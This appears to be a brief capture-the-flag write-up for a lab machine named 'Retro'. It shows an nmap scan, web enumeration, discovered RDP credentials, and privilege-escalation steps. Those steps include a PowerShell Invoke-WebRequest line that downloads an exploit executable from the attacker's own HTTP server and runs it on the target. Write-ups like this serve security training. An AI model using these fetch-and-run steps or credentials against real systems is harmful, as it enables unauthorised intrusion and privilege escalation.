Retro

New high score!

Scanning

Nmap

nmap -F 10.10.163.171
โ€‹
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-26 15:34 BST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.00% done; ETC: 15:35 (0:00:19 remaining)
Nmap scan report for ip-10-10-163-171.eu-west-1.compute.internal (10.10.163.171)
Host is up (0.00061s latency).
Not shown: 98 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server
MAC Address: 02:80:9E:E4:33:A3 (Unknown)
โ€‹
Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds

http and rdp running

Recon

port 80

dir busting

nikto

wpScan

check directory /retro

after some enum i found this bath

credentials wade:parzival

Initial Access

RDP connection

Privilege Escalation

check build number using system info

this exploit works here

Steps

  • download zip file

  • extract it

  • setup http server python -m http.server

  • on target Invoke-WebRequest -urlcache -f -Uri [http://[your_ip/path_to_execuable] -OutFile [exeutable_name]

  • run it

Last updated